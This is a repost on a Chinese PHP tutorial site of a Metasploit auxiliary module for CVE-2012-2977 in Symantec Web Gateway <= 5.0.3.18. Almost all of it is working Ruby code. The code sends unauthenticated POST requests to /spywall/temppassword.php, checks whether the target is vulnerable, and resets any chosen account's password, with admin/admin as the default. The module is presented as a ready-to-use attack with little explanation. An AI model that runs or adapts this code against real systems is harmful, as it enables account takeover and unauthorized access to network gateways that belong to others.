网站地图    收藏   

主页 > 后端 > 网站安全 >

Symantec Web Gateway <= 5.0.3.18任意密码修改(MSF)

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] ### @_Kc57# Symantec Web Gateway = 5.0.3.18 Arbitrary Password Change##require #39;msf/core#39;class Metasploit3 Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def i......

## 
 
# @_Kc57 
 
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change 
 
## 
 
  
 
require 'msf/core'
 
  
 
class Metasploit3 < Msf::Auxiliary 
 
  
 
    include Msf::Exploit::Remote::HttpClient 
 
  
 
    def initialize(info={}) 
 
        super(update_info(info, 
 
            'Name'           => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change", 
 
            'Description'    => %q{ 
 
                    This module will change the password for the specified account on a Symantec Web Gatewaye server. 
 
            }, 
 
            'License'        => MSF_LICENSE, 
 
            'Version'        => "$Revision: 0 $", 
 
            'Author'         => 
 
                [ 
 
                    'Kc57', 
 
                ], 
 
            'References'     => 
 
                [ 
 
                    [ 'CVE', '2012-2977' ], 
 
                    [ 'OSVDB', '0' ], 
 
                    [ 'BID', '54430' ], 
 
                    [ 'URL', 'http://www.securityfocus.com/bid/54430' ], 
 
                ], 
 
            'DisclosureDate' => "Jul 23 2012" )) 
 
  
 
            register_options( 
 
                [ 
 
                    Opt::RPORT(80), 
 
                    OptString.new('USER', [ true, 'The password to reset to', 'admin']), 
 
                    OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin']) 
 
                ], self.class) 
 
    end
 
  
 
    def run 
 
  
 
        print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password") 
 
        res = send_request_raw( 
 
        { 
 
            'method'  => 'POST', 
 
            'uri'     => '/spywall/temppassword.php', 
 
        }, 25) 
 
  
 
        #check to see if we get HTTP OK 
 
        if (res.code == 200) 
 
            print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable") 
 
        else
 
            print_error("Did not get HTTP 200, URL was not found. Exiting!") 
 
            return
 
        end
 
  
 
        #Check to if the temppassword.php page loads or if we are redirected to the login page 
 
        if (res.body.match(/Please Select a New Password/i)) 
 
            print_status("Server is vulnerable!") 
 
        else
 
            print_error("Target doesn't seem to be vulnerable!") 
 
            return
 
        end
 
  
 
        print_status("Attempting to exploit password change vulnerability on #{rhost}") 
 
        print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}") 
 
  
 
        data  = 'target=executive_summary.php'
 
        data << '&USERNAME=' + datastore['USER'] 
 
        data << '&password=' + datastore['PASSWORD'] 
 
        data << '&password2=' + datastore['PASSWORD'] 
 
        data << '&Save=Save'
 
  
 
        res = send_request_cgi( 
 
        { 
 
            'method'  => 'POST', 
 
            'uri'     => '/spywall/temppassword.php', 
 
            'data'    => data, 
 
        }, 25) 
 
  
 
        if res.code == 200
 
            if (res.body.match(/Thank you/i)) 
 
                print_status("Password reset was successful!\n") 
 
            else
 
                print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n") 
 
            end
 
        else
 
            print_error("Password reset failed!") 
 
        end
 
    end
 
  
 
end

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论